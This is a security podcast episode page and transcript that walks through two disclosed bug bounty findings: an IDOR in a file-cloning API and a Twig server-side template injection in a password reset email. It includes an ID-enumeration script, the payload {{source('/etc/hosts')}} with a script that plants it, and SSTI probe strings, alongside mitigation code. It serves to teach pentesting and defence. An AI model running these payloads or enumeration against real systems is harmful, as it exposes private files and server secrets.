
Hacked & Secured: Pentest Exploits & Mitigations
If you know how attacks work, you’ll know exactly where to look—whether you’re breaking in as an ethical hacker or defending as a blue teamer.
Hacked & Secured: Pentest Exploits & Mitigations breaks down real-world pentest findings, exposing how vulnerabilities were discovered, exploited, and mitigated.
Each episode dives into practical security lessons, covering attack chains and creative exploitation techniques used by ethical hackers. Whether you're a pentester, security engineer, developer, or blue teamer, you'll gain actionable insights to apply in your work.
🎧 New episodes every month.
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram, Website Link
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
Hacked & Secured: Pentest Exploits & Mitigations
Ep. 7 – IDOR & SSTI: From File Theft to Server-Side Secrets
A predictable ID exposed private documents. A crafted name leaked backend files.
In this episode, we break down two high-impact flaws—an IDOR that let attackers clone confidential attachments, and an SSTI hidden in an email template that revealed server-side files. Simple inputs, big consequences. Learn how they worked, why they were missed, and how to stop them.
Chapters:
00:00 - INTRO
01:28 - FINDING #1 – IDOR to Steal Confidential Files with Just an Attachment ID
09:05 - FINDING #2 – Server-Side Template Injection That Leaked Local Files
18:41 - OUTRO
Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
🔗 Podcast Website → Website Link
INTRO
What if changing just one ID in a URL let you clone confidential documents that were never meant for you to see?
And what if you could go even deeper—exploiting a hidden email template engine to quietly read files straight off the server... just by tweaking your username?
I’m Amin Malekpour, and you’re listening to Hacked & Secured: Pentest Exploits & Mitigations.
Today, we’re breaking down two real-world exploits that required no special tools.
First, an IDOR vulnerability that let attackers steal private files using nothing but a predictable ID.
Then, a clever SSTI that leaked backend files through a password reset email, without ever touching the frontend.
And before we dive in—if you’ve come across something interesting in your own pentests, send it in. We’re always looking to feature creative findings from the community.
No need to write a full story—just drop the details, and remember to keep client info private. You’ll find the Google Form link in the description.
FINDING #1 – IDOR to Steal Confidential Files with Just an Attachment ID
You upload a file—maybe it’s a medical report, a contract, something personal. You hit submit, and you think, “Alright, that’s secure. Only the right people can access it.”
But what if I told you someone else could download that same file?
No hacking tools. No brute force.
Just by guessing an ID. Crazy, right?
That’s exactly what Oxylis uncovered in a report on HackerOne—
An Insecure Direct Object Reference, or IDOR, that allowed attackers to clone and access private files they were never supposed to see.
Before we get into the attack, let’s quickly break down what IDOR is—for anyone who’s not familiar with it.
Imagine you’re staying at a hotel. You’ve been given Room 305, and your keycard is supposed to open only that room. Now, let’s say the hotel made a big mistake—they never actually check whether your keycard matches the room you’re trying to open. They just assume you’ll only try your own door.
But out of curiosity, you walk up to Room 306, try the same keycard—and it opens. You try 307—same thing, it opens.
No one’s checking if you’re actually allowed in those rooms.
That’s basically what an Insecure Direct Object Reference, or IDOR, looks like.
The app gives you access to something—like a document, invoice, or attachment—using predictable IDs in the URL, like /attachment/123. But it doesn’t really check if that ID belongs to you. It just blindly trusts that if you know the number, you’re authorised.
So what happens if you change 123 in that URL to 124?
In a vulnerable system, it might just hand over someone else’s file—no questions asked.
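If you want to see what that missing check looks like in code, here’s a minimal sketch. It’s Flask-style Python with made-up names, not the actual portal from this report:

```python
# Hypothetical sketch of the IDOR pattern (not the actual portal's code).
from flask import Flask, abort, send_file, session

app = Flask(__name__)
app.secret_key = "dev-only"  # placeholder, needed for session support

# In-memory stand-in for the real datastore.
ATTACHMENTS = {
    "doc103": {"owner_id": "alice", "path": "/srv/files/doc103.pdf"},
    "doc104": {"owner_id": "bob", "path": "/srv/files/doc104.pdf"},
}

# Vulnerable: trusts the ID and never checks who owns the attachment.
@app.route("/attachment/<attachment_id>")
def get_attachment(attachment_id):
    record = ATTACHMENTS.get(attachment_id)
    if record is None:
        abort(404)
    return send_file(record["path"])  # anyone who knows the ID gets the file

# Fixed: same lookup, plus an explicit ownership check.
@app.route("/v2/attachment/<attachment_id>")
def get_attachment_safe(attachment_id):
    record = ATTACHMENTS.get(attachment_id)
    if record is None or record["owner_id"] != session.get("user_id"):
        abort(404)  # same response either way, so IDs can't be probed
    return send_file(record["path"])
```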
Alright, let’s get back to the story.
Oxylis was testing a secure online portal—the kind that handles sensitive documents. Medical records, legal files… the kind of data you don’t want falling into the wrong hands.
While poking around, they noticed something odd: the file IDs looked a little too predictable.
doc102, doc103, doc104—that kind of pattern. Simple, sequential, no randomness.
Then, while digging through the network traffic, they spotted something even more interesting:
an internal API—a hidden endpoint that let users clone files.
Here’s how the API worked: you’d give it a file ID, and it would make a copy of that file and attach it to your own profile.
The problem?
It didn’t check ownership.
It never asked, “Are you allowed to access this file?” or “Is this file even yours?” It was a textbook Insecure Direct Object Reference.
It just quietly responded:
"File cloned. Here you go."
No alerts. No logs. No questions asked.
Now put yourself in Oxylis’s shoes.
You’ve found an internal API that lets you clone any attachment in the system. No checks. No restrictions.
What would you do next?
• Start testing file IDs tied to high-value profiles and scrape whatever attachments you can find?
• Look for internal documents or reports that might help you pivot deeper into the system?
• Or just automate the whole thing—clone hundreds of files in minutes?
This wasn’t a minor bug.
This was unauthorised access to sensitive data—at scale.
So here’s what Oxylis did:
They crafted a request using the cloning API. Basically telling the system,
“Hey, take this random file ID—say, doc104—and just copy it to my account.”
And the system replied:
"Sure. Give me a second..."
And just like that, it worked.
Once the file was cloned and linked to their profile, they could easily download it like they owned it.
And we’re not just talking profile pictures.
Some of these were deeply private documents—including personal medical records and even classified reports.
Here’s the full attack chain, step by step:
• First, predict or enumerate valid file IDs
• Then, use the internal clone API to copy the file to your own account
• Finally, download it through the normal user-facing endpoint
No errors.
No alerts.
Just access.
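Put together as a script, the chain might look something like this. The endpoint and field names here are hypothetical, and of course you should only ever run this kind of enumeration against systems you’re authorised to test:

```python
# Sketch of the three-step chain with hypothetical endpoint/field names.
import requests

BASE = "https://target.example"
session = requests.Session()
session.headers["Authorization"] = "Bearer <attacker-session-token>"  # placeholder

for n in range(100, 120):                 # step 1: walk the predictable ID space
    file_id = f"doc{n}"
    clone = session.post(f"{BASE}/api/internal/clone",  # step 2: clone to own account
                         json={"attachment_id": file_id})
    if clone.ok:
        new_id = clone.json()["new_attachment_id"]      # hypothetical response field
        download = session.get(f"{BASE}/attachment/{new_id}")  # step 3: normal download
        print(f"{file_id}: {len(download.content)} bytes")
```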
You’d think apps wouldn’t still fail like this in 2025.
But they do.
In real-world pentests, IDORs pop up all the time.
Why? Because systems are often built on assumptions like:
• “No one’s going to guess these IDs.” — But they do.
• “Internal APIs aren’t exposed.” — But they usually are.
• “Frontend checks are enough.” — But believe me, they never are.
And the trickiest part?
These flaws don’t hide in fancy features. They show up in everyday stuff—like file cloning, shared links, or document previews—places where access checks quietly get skipped.
No fancy exploit needed—just changing a number and walking right in.
So what was the root of the problem here?
Simple. The system made a few critical assumptions:
• It exposed a backend cloning feature without properly securing it.
• It didn’t check whether the user actually owned the file before cloning it.
• And once the file was cloned, it just assumed, “Well, now it’s safe to serve to this new user.”
Here’s how this could’ve been prevented:
• Always validate ownership. Whether it’s cloning, downloading, or sharing, check if the user has the right permission.
• Treat internal APIs like public ones. Just because they’re not exposed in the UI doesn’t mean attackers won’t find them.
• Block access based on IDs unless the user is explicitly linked to that resource.
• And finally, avoid using predictable IDs—use random, unguessable identifiers instead.
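The last two points are easy to sketch in code. A hypothetical example, not the platform’s actual fix:

```python
# Unguessable IDs plus a single, mandatory ownership check.
import uuid

def new_attachment_id() -> str:
    # uuid4 gives ~122 bits of randomness; doc102-style IDs give almost none.
    return uuid.uuid4().hex

def assert_owns(user_id: str, record: dict) -> None:
    # Called by every code path that touches a file: clone, download,
    # share, preview. No exceptions, including "internal" APIs.
    if record.get("owner_id") != user_id:
        raise PermissionError("not your file")
```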
This vulnerability didn’t require advanced skills to exploit. It just took someone looking in a place no one else bothered to check.
Alright, fellow pentesters, here’s how you find vulnerabilities like this in your daily engagements:
• When you see predictable IDs—things like attachment IDs, document numbers, or user IDs—don’t just observe them. Start modifying them. Try values just before and after the one you’ve been assigned. Look for patterns. See how far you can go.
• Test every API endpoint you can find, even the weird ones buried in network traffic. Just because it’s undocumented doesn’t mean it’s protected. Some of the best IDORs hide in places developers assume are safe.
• And finally, use tools or scripts to enumerate object IDs at scale. If the format is consistent, automation can help you quickly identify what’s exposed.
Security isn’t just about locking things down. It’s about thinking through how systems behave when users—or attackers—don’t follow the happy path.
Because sometimes, the most dangerous breaches start with the most innocent-looking request. And in this case?
All it took was an ID, a broken controller, and a platform that trusted too easily.
That’s the kind of oversight that leads to full-scale data exposure.
FINDING #2 – Server-Side Template Injection That Leaked Local Files
In Finding #1, predictable attachment IDs and a hidden clone API let stored files be copied and exfiltrated through a broken object reference, all the way to full document access.
But what if I told you the next attack didn’t need predictable URLs or broken logic at all?
No need to brute-force anything. No need to escalate privileges.
Just one special payload… inserted into your name… that quietly pulled files from the backend server.
This is exactly what r29k reported on Bugcrowd—a Server-Side Template Injection, or SSTI, that gave attackers access to local files on the system.
Before we get into the attack, let’s take a second to break down what SSTI is.
SSTI, short for Server-Side Template Injection, happens when user input is passed directly into a backend template engine without proper sanitisation. Instead of treating that input as plain text, the engine interprets it as code. This lets attackers inject expressions that get executed on the server, starting with small things like math operations but potentially leading to serious issues like leaking sensitive data or even executing system commands.
Think of it like this: you’re at a bakery that uses a system to print custom messages on cakes. You write “Happy Birthday!” and they print it, no problem. But what if someone writes “{{delete_all_orders}}” and the bakery’s system runs it instead of printing it, wiping out every order in the process? That’s SSTI—the system trusts input too much, and instead of just displaying it, it executes it.
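Here’s the same failure in runnable form, a minimal sketch using Python’s Jinja2. The app in this story ran Twig on PHP, but the root cause is identical:

```python
# The root cause of SSTI: user input ends up in the template SOURCE.
from jinja2 import Template

user_name = "{{ 7 * 7 }}"  # attacker-controlled input

# Vulnerable: input is concatenated into the template source,
# so the engine treats it as code.
print(Template("Hello " + user_name).render())  # -> Hello 49

# Safe: the template is a fixed string and the input arrives as data.
print(Template("Hello {{ name }}").render(name=user_name))  # -> Hello {{ 7 * 7 }}
```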
Alright, let’s get back to the story. r29k was testing a small web app, nothing fancy. Most of the obvious bugs were already patched. Then he noticed something interesting: the Edit Profile page allowed special characters in the name field. That’s always worth testing.
So he tried something simple and changed his name to:
Two opening curly brackets, seven multiplied by seven in quotes, two closing curly brackets, then a space and the word test. Written out, the payload is: {{'7'*'7'}} test. He saved it.
So here’s where it gets interesting.
After changing his profile name, he expected to see something like “49 test” show up somewhere on the site—maybe in the account settings, maybe in the header. But it didn’t appear anywhere. No reflection on the frontend. No visible output. It looked like a dead end.
Maybe the app wasn’t vulnerable to SSTI after all. But instead of dropping the test, he thought like an attacker: “Where else could my name show up where I wouldn’t see it directly in the browser?” And that’s when it hit him: emails. Specifically, the password reset email.
He headed over to the Forgot Password page and submitted a password reset request for his account. A few seconds later, the reset email landed in his inbox.
And right there in the greeting—“Hello 49”—was the proof of SSTI. The payload had executed. The math operation inside the double curly brackets ran on the server, and the output, 49, was now embedded in the email. That’s when it all clicked. He had found a Server-Side Template Injection vulnerability executing inside the backend email system.
Once he confirmed the payload executed, it was time to move from discovery to exploitation. But here’s the thing—just knowing that the system is vulnerable to SSTI isn’t enough. To go further, you need to know what template engine is running on the backend, because every engine has its own syntax, and the engine determines what you can do and which payloads will work.
So he kicked off the exploitation phase by throwing in a few test payloads. First, he tried a trick that works in some template engines: running shell commands by treating “system” as a filter. But in this case, the email came back blank, no output at all.
Then he tried another payload, one aimed at template engines that expose file-reading functions, designed to extract 30 characters from a specific file on the server.
Same result. Blank email.
He tried variations—different functions, different formats—and every time, either the server silently stripped the payload or returned an empty string in the email body.
This told him something important. Either the template engine was sandboxed—meaning dangerous functions were disabled—or the app was silently filtering out certain types of payloads behind the scenes.
But he didn’t stop. Instead of guessing blindly, he did the smart thing: he backed off and started fingerprinting the engine.
He looked at the syntax of the earlier payload, the one that worked and returned “Hello 49” in the password reset email. That format, especially the single quotes inside the double curly brackets, looked a lot like Twig, a popular template engine used in many PHP-based web apps. In Twig, multiplying the strings ‘7’ and ‘7’ coerces them to numbers and returns 49, while many other engines would simply throw an error on that expression.
So he started digging into Twig’s documentation—line by line—looking for exposed functions that could be abused without needing system filters or direct command execution.
And that’s when he found the source() function.
This function in Twig is used to include the contents of a template file, and in some configurations, it lets you pass a file path directly. So he crafted a new payload using double curly brackets, wrapping a source function that tries to read the /etc/hosts file: {{source('/etc/hosts')}}.
Then, once again, he triggered a password reset.
And this time, the email didn’t come back empty. It came back with the contents of the hosts file printed right there in the body of the message.
That was it. Proof of file read on the backend server through nothing more than a crafted name and a triggered password reset email.
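Condensed into a script, the whole exploit might look like this. The endpoint and field names are hypothetical; the payload shape follows the report:

```python
# End-to-end sketch: plant the payload, then trigger the render.
import requests

BASE = "https://target.example"
s = requests.Session()

# Step 1: plant the payload in the profile name field.
s.post(f"{BASE}/profile/edit", data={"name": "{{source('/etc/hosts')}}"})

# Step 2: trigger the email that renders the name on the server.
s.post(f"{BASE}/forgot-password", data={"email": "attacker@example.com"})

# Step 3: open the reset email -- the greeting now contains /etc/hosts.
```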
Let’s pause for a second.
If you had just found an SSTI vulnerability that lets you read any file the server has access to, what would you do next?
Would you…
• Try reading /etc/passwd to fingerprint the environment?
• Look for SSH private keys, API tokens, or secrets sitting in user directories?
• Load internal config files—maybe grab database credentials or email service secrets?
This isn’t just a cool trick. This is deep, backend access—all through a single email template vulnerability.
You’re inside the server’s brain, just by injecting a string.
So how did this even happen?
It all came down to one thing—trusting user input too much.
• The app took input from the user and passed it straight into the template engine—no escaping, no filtering.
• Then, when the email system kicked in, it just rendered that input blindly while generating the message.
• And even though the engine was sandboxed, a function like source() was still available—which meant the attacker could start reading files from the server.
Now, let’s talk about how this could’ve been prevented:
• Never feed raw user input directly into template engines—always escape it or use strict allowlisting.
• In production, lock things down—disable risky functions like source() or anything that allows system access.
• And don’t stop at testing the website. Check the stuff running in the background as well—like email templates, PDF exports, and anything else that quietly uses user data behind the scenes.
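In code, the first two mitigations might look like this minimal Jinja2 sketch (Twig ships analogous escaping and sandbox features):

```python
# Two defensive layers. Layer 1 is the real fix; layer 2 limits the
# blast radius if something slips through.
from jinja2.sandbox import SandboxedEnvironment

env = SandboxedEnvironment(autoescape=True)  # layer 2: restricted engine

def render_greeting(user_name: str) -> str:
    # Layer 1: the template source is a constant. User input only ever
    # enters through the render context, never through the template string.
    return env.from_string("Hello {{ name }}").render(name=user_name)

print(render_greeting("{{source('/etc/hosts')}}"))  # payload comes out as inert text
```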
Most teams test their main pages for injection. But what about the emails your app sends out every single day?
That’s where bugs like this hide.
And for my fellow pentesters—here’s how you can find vulnerabilities like this during your day-to-day testing:
• Don’t just test the obvious stuff. Go beyond web pages. Look at email templates, PDF exports, and any background features that quietly process user input. That’s where SSTIs love to hide.
• When you find a spot that looks like it’s using a template engine, start simple. Try basic math expressions. If you get a calculated response back, you’ve confirmed execution. Then move on to the fun part: real exploitation.
• Think outside the frontend. r29k found this SSTI in a password reset email, not the site itself. So if you don’t see reflection in the UI, don’t stop. Try places like email content, logs, or even exports. And if you do get reflection? Go further. See if you can read files from the server or call safe system functions. (A few starter probes are sketched below.)
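A handful of classic first-probe expressions. Which one evaluates, and to what, helps fingerprint the engine:

```python
# Common SSTI probes; behaviour varies by engine and configuration.
PROBES = [
    "{{7*7}}",      # Twig, Jinja2 and friends -> 49
    "{{'7'*'7'}}",  # Twig -> 49 (string-to-number coercion); Jinja2 errors
    "${7*7}",       # FreeMarker-style engines -> 49
    "<%= 7*7 %>",   # ERB-style engines -> 49
]
```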
Template engines were designed to make apps flexible and dynamic.
But the moment user input gets treated as code?
Trust me—the only limit is how far you're willing to push the boundary.
OUTRO
All of the vulnerabilities we covered today were responsibly disclosed—and that matters.
Finding issues is only half the job. Helping teams fix them before attackers exploit them is what truly makes the internet safer for everyone.
If you found this episode valuable, share it with one or two people who’d appreciate it.
Someone in your network might be building an API, writing a template, or skipping access checks, and this episode could be the thing that saves them from making the same mistake.
Let’s make cybersecurity knowledge accessible to all.
See you in the next episode.